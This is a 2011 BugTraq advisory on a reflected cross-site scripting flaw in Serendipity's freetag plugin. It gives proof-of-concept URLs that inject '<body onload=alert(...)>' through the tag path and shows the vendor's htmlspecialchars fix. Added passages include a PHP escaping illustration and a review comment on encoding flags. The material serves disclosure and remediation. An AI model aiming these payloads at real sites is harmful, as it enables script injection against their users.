BugTraq
Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag" May 31 2011 10:28AM
sschurtz t-online de
Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"

Advisory ID: SSCHADV2011-004

Author: Stefan Schurtz

Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21

Vendor URL: http://www.s9y.org

Vendor Status: Version 3.22 - Fix possible XSS

CVE-ID: -

==========================

Vulnerability Description:

==========================

The tag name taken from the URL path (/plugin/tag/...) is reflected into the page title without HTML encoding, which allows Cross-Site Scripting.

==================

Technical Details:

==================

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>

http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>

http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>
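The following PHP is an added illustration and not code from the serendipity_event_freetag plugin. It reproduces the title-building expression that 3.21 used (the `is_array ... implode` form visible in the diff further down) on the tag segments from the URLs above, once passed through unchanged and once wrapped in htmlspecialchars() with explicit flags. The function names, the extra sample inputs and the choice of flags are assumptions made here, not the vendor's fix.

```php
<?php
// Added example, not code from the serendipity_event_freetag plugin.
// freetag_title_unescaped() mirrors the 3.21 expression from the plugin;
// freetag_title_escaped() is a constructed hardened variant with explicit flags.

// 3.21 behaviour: the tag name from the URL is joined and passed through unchanged.
function freetag_title_unescaped($displayTag) {
    return is_array($displayTag) ? implode(' + ', $displayTag) : $displayTag;
}

// Hardened variant. ENT_QUOTES encodes both quote characters (the default flags
// before PHP 8.1 leave single quotes alone), ENT_SUBSTITUTE (PHP 5.4+) replaces
// invalid UTF-8 with U+FFFD instead of returning an empty string, and the charset
// is stated explicitly rather than inherited from php.ini.
function freetag_title_escaped($displayTag) {
    $title = is_array($displayTag) ? implode(' + ', $displayTag) : $displayTag;
    return htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: the first two are the tag segments from the PoC URLs above,
// the others are extra cases chosen to exercise the flags.
$samples = [
    'hallo=><body onload=alert(666)>',
    '<body onload=alert(String.fromCharCode(88,83,83))>',
    ['rock', "'n' roll"],   // multi-tag path containing only single quotes
    "caf\xC3",              // truncated UTF-8 sequence
];

foreach ($samples as $tag) {
    $raw  = freetag_title_unescaped($tag);
    $safe = freetag_title_escaped($tag);
    echo "raw:  ", $raw, "\n";
    echo "safe: ", $safe, "\n\n";
    // Nothing the browser could read as a tag or attribute delimiter survives.
    assert(strpbrk($safe, "<>\"'") === false);
}
```

Run it with `php example.php` (any name; the file name is not fixed). The third sample is the one that separates a default-flag call from the ENT_QUOTES form: on PHP before 8.1 the default leaves the single quotes in place, so a template that prints the title inside a single-quoted attribute would still be exposed, while the explicit flags produce `&#039;` regardless of PHP version.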

=========

Solution:

=========

Update to the latest version 3.22

diff serendipity_event_freetag.php

< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $

> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $

< $propbag->add('version', '3.21');

> $propbag->add('version', '3.22');

< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);

> $serendipity['smarty']->assign('freetag_tagTitle', htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag));
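Review bot: the htmlspecialchars() call on the replacement line relies on the default flags and the default charset; before PHP 8.1 the default flags are ENT_COMPAT, so a single quote in the tag passes through unencoded and a template that places freetag_tagTitle inside a single-quoted attribute would still be exposed. Passing ENT_QUOTES explicitly (and, on PHP 5.4 or later, ENT_SUBSTITUTE together with 'UTF-8') makes the result independent of the PHP version and php.ini, e.g. `htmlspecialchars($title, ENT_QUOTES, 'UTF-8')`. Also worth a comment in the code: the value is now encoded at assignment time, so any template that applies Smarty's own escape modifier to freetag_tagTitle will double-encode it from 3.22 on.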

====================

Disclosure Timeline:

====================

30-May-2011 - informed developers

30-May-2011 - Release date of this security advisory

30-May-2011 - Version 3.22 - Fix possible XSS

31-May-2011 - post on BugTraq and Full-disclosure

========

Credits:

========

Vulnerability found and advisory written by Stefan Schurtz.

===========

References:

===========

http://www.s9y.org

http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html

http://www.rul3z.de/advisories/SSCHADV2011-004.txt

http://ha.ckers.org/xss.html
